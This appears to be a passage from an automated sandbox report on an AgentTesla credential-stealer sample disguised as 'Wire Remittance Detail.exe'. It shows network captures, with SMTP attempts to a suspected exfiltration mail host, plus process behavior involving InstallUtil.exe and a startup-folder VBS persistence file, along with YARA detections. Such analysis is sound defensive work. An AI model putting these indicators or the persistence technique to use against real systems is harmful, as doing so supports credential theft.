                                                                    .reloc0x1180000xc0x20028f06a8fd82127c8289a1dedfd17af79False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_VERSION0x1160a00x32cdata0.4224137931034483
                                                                    RT_MANIFEST0x1163cc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                    Imports

                                                                    DLLImport
                                                                    mscoree.dll_CorExeMain

                                                                    Version Infos

                                                                    DescriptionData
                                                                    Translation0x0000 0x04b0
                                                                    Comments
                                                                    CompanyName
                                                                    FileDescriptionZedcnnrkti
                                                                    FileVersion1.0.0.0
                                                                    InternalNameZedcnnrkti.exe
                                                                    LegalCopyrightCopyright 2012
                                                                    LegalTrademarks
                                                                    OriginalFilenameZedcnnrkti.exe
                                                                    ProductNameZedcnnrkti
                                                                    ProductVersion1.0.0.0
                                                                    Assembly Version1.0.0.0

                                                                    Network Behavior

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Mar 11, 2025 09:22:55.202249050 CET49681443192.168.2.10104.26.13.205
                                                                    Mar 11, 2025 09:22:55.202290058 CET44349681104.26.13.205192.168.2.10
                                                                    Mar 11, 2025 09:22:55.202451944 CET49681443192.168.2.10104.26.13.205
                                                                    Mar 11, 2025 09:22:55.213167906 CET49681443192.168.2.10104.26.13.205
                                                                    Mar 11, 2025 09:22:55.213190079 CET44349681104.26.13.205192.168.2.10
                                                                    Mar 11, 2025 09:22:57.384313107 CET44349681104.26.13.205192.168.2.10
                                                                    Mar 11, 2025 09:22:57.384516954 CET49681443192.168.2.10104.26.13.205
                                                                    Mar 11, 2025 09:22:57.390485048 CET49681443192.168.2.10104.26.13.205
                                                                    Mar 11, 2025 09:22:57.390507936 CET44349681104.26.13.205192.168.2.10
                                                                    Mar 11, 2025 09:22:57.390835047 CET44349681104.26.13.205192.168.2.10
                                                                    Mar 11, 2025 09:22:57.441710949 CET49681443192.168.2.10104.26.13.205
                                                                    Mar 11, 2025 09:22:57.455668926 CET49681443192.168.2.10104.26.13.205
                                                                    Mar 11, 2025 09:22:57.496324062 CET44349681104.26.13.205192.168.2.10
                                                                    Mar 11, 2025 09:22:58.842782974 CET44349681104.26.13.205192.168.2.10
                                                                    Mar 11, 2025 09:22:58.842945099 CET44349681104.26.13.205192.168.2.10
                                                                    Mar 11, 2025 09:22:58.843110085 CET49681443192.168.2.10104.26.13.205
                                                                    Mar 11, 2025 09:22:58.933212996 CET49681443192.168.2.10104.26.13.205
                                                                    Mar 11, 2025 09:23:00.215179920 CET4968225192.168.2.1046.175.148.58
                                                                    Mar 11, 2025 09:23:01.222866058 CET4968225192.168.2.1046.175.148.58
                                                                    Mar 11, 2025 09:23:03.222879887 CET4968225192.168.2.1046.175.148.58
                                                                    Mar 11, 2025 09:23:07.238487959 CET4968225192.168.2.1046.175.148.58
                                                                    Mar 11, 2025 09:23:09.356456041 CET49685443192.168.2.10104.26.13.205
                                                                    Mar 11, 2025 09:23:09.356519938 CET44349685104.26.13.205192.168.2.10
                                                                    Mar 11, 2025 09:23:09.356914997 CET49685443192.168.2.10104.26.13.205
                                                                    Mar 11, 2025 09:23:09.360615015 CET49685443192.168.2.10104.26.13.205
                                                                    Mar 11, 2025 09:23:09.360637903 CET44349685104.26.13.205192.168.2.10
                                                                    Mar 11, 2025 09:23:11.291117907 CET44349685104.26.13.205192.168.2.10
                                                                    Mar 11, 2025 09:23:11.291208982 CET49685443192.168.2.10104.26.13.205
                                                                    Mar 11, 2025 09:23:11.293260098 CET49685443192.168.2.10104.26.13.205
                                                                    Mar 11, 2025 09:23:11.293275118 CET44349685104.26.13.205192.168.2.10
                                                                    Mar 11, 2025 09:23:11.293544054 CET44349685104.26.13.205192.168.2.10
                                                                    Mar 11, 2025 09:23:11.347883940 CET49685443192.168.2.10104.26.13.205
                                                                    Mar 11, 2025 09:23:11.348670959 CET49685443192.168.2.10104.26.13.205
                                                                    Mar 11, 2025 09:23:11.396325111 CET44349685104.26.13.205192.168.2.10
                                                                    Mar 11, 2025 09:23:11.933619022 CET44349685104.26.13.205192.168.2.10
                                                                    Mar 11, 2025 09:23:11.933695078 CET44349685104.26.13.205192.168.2.10
                                                                    Mar 11, 2025 09:23:11.933743954 CET49685443192.168.2.10104.26.13.205
                                                                    Mar 11, 2025 09:23:11.937016964 CET49685443192.168.2.10104.26.13.205
                                                                    Mar 11, 2025 09:23:12.577893019 CET4968825192.168.2.1046.175.148.58
                                                                    Mar 11, 2025 09:23:13.566638947 CET4968825192.168.2.1046.175.148.58
                                                                    Mar 11, 2025 09:23:15.566663027 CET4968825192.168.2.1046.175.148.58
                                                                    Mar 11, 2025 09:23:19.566626072 CET4968825192.168.2.1046.175.148.58
                                                                    Mar 11, 2025 09:23:27.566648960 CET4968825192.168.2.1046.175.148.58

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Mar 11, 2025 09:22:55.188963890 CET5511153192.168.2.101.1.1.1
                                                                    Mar 11, 2025 09:22:55.196198940 CET53551111.1.1.1192.168.2.10
                                                                    Mar 11, 2025 09:23:00.194535971 CET6335253192.168.2.101.1.1.1
                                                                    Mar 11, 2025 09:23:00.214318991 CET53633521.1.1.1192.168.2.10

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Mar 11, 2025 09:22:55.188963890 CET192.168.2.101.1.1.10x21eeStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                    Mar 11, 2025 09:23:00.194535971 CET192.168.2.101.1.1.10x8e3bStandard query (0)mail.iaa-airferight.comA (IP address)IN (0x0001)false

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Mar 11, 2025 09:22:55.196198940 CET1.1.1.1192.168.2.100x21eeNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                    Mar 11, 2025 09:22:55.196198940 CET1.1.1.1192.168.2.100x21eeNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                    Mar 11, 2025 09:22:55.196198940 CET1.1.1.1192.168.2.100x21eeNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                    Mar 11, 2025 09:23:00.214318991 CET1.1.1.1192.168.2.100x8e3bNo error (0)mail.iaa-airferight.com46.175.148.58A (IP address)IN (0x0001)false

                                                                    HTTP Request Dependency Graph

                                                                    • api.ipify.org

                                                                    HTTPS Proxied Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.1049681104.26.13.2054436236C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-03-11 08:22:57 UTC155OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                    Host: api.ipify.org
                                                                    Connection: Keep-Alive
                                                                    2025-03-11 08:22:58 UTC426INHTTP/1.1 200 OK
                                                                    Date: Tue, 11 Mar 2025 08:22:58 GMT
                                                                    Content-Type: text/plain
                                                                    Content-Length: 13
                                                                    Connection: close
                                                                    Vary: Origin
                                                                    cf-cache-status: DYNAMIC
                                                                    Server: cloudflare
                                                                    CF-RAY: 91e9a5a41f8c0add-LAS
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=13470&min_rtt=9681&rtt_var=11210&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4190&recv_bytes=769&delivery_rate=71969&cwnd=232&unsent_bytes=0&cid=f5ccd57915c39c8d&ts=1024&x=0"
                                                                    2025-03-11 08:22:58 UTC13INData Raw: 35 30 2e 31 35 39 2e 33 32 2e 32 35 32
                                                                    Data Ascii: 50.159.32.252


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.1049685104.26.13.2054437136C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-03-11 08:23:11 UTC155OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                    Host: api.ipify.org
                                                                    Connection: Keep-Alive
                                                                    2025-03-11 08:23:11 UTC425INHTTP/1.1 200 OK
                                                                    Date: Tue, 11 Mar 2025 08:23:11 GMT
                                                                    Content-Type: text/plain
                                                                    Content-Length: 13
                                                                    Connection: close
                                                                    Vary: Origin
                                                                    cf-cache-status: DYNAMIC
                                                                    Server: cloudflare
                                                                    CF-RAY: 91e9a5f9c9770ad5-LAS
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=13896&min_rtt=8816&rtt_var=7037&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=328121&cwnd=251&unsent_bytes=0&cid=9138f526b0606026&ts=773&x=0"
                                                                    2025-03-11 08:23:11 UTC13INData Raw: 35 30 2e 31 35 39 2e 33 32 2e 32 35 32
                                                                    Data Ascii: 50.159.32.252


                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Target ID:0
                                                                    Start time:04:22:53
                                                                    Start date:11/03/2025
                                                                    Path:C:\Users\user\Desktop\Wire Remittance Detail.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\Wire Remittance Detail.exe"
                                                                    Imagebase:0xcd0000
                                                                    File size:1'129'472 bytes
                                                                    MD5 hash:834A1E4418D9543BCBB76AA9BD15FECE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1105377682.0000000005B50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1101766073.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1101766073.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1083367719.0000000003041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1101766073.00000000043EE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:2
                                                                    Start time:04:22:53
                                                                    Start date:11/03/2025
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                    Imagebase:0xc70000
                                                                    File size:42'064 bytes
                                                                    MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1228824034.000000000312C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1223807451.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1223807451.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1228824034.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1228824034.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:3
                                                                    Start time:04:23:06
                                                                    Start date:11/03/2025
                                                                    Path:C:\Windows\System32\wscript.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AssemblyFullName.vbs"
                                                                    Imagebase:0x7ff62fe70000
                                                                    File size:170'496 bytes
                                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:5
                                                                    Start time:04:23:07
                                                                    Start date:11/03/2025
                                                                    Path:C:\Users\user\AppData\Roaming\AssemblyFullName.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Roaming\AssemblyFullName.exe"
                                                                    Imagebase:0xc20000
                                                                    File size:1'129'472 bytes
                                                                    MD5 hash:834A1E4418D9543BCBB76AA9BD15FECE
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1252075930.0000000004322000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1252075930.0000000004322000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.1226380633.0000000003112000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 54%, Virustotal, Browse
                                                                    • Detection: 55%, ReversingLabs
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:6
                                                                    Start time:04:23:08
                                                                    Start date:11/03/2025
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                    Imagebase:0x590000
                                                                    File size:42'064 bytes
                                                                    MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2318499009.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2318499009.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2318499009.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Disassembly

                                                                    Reset < >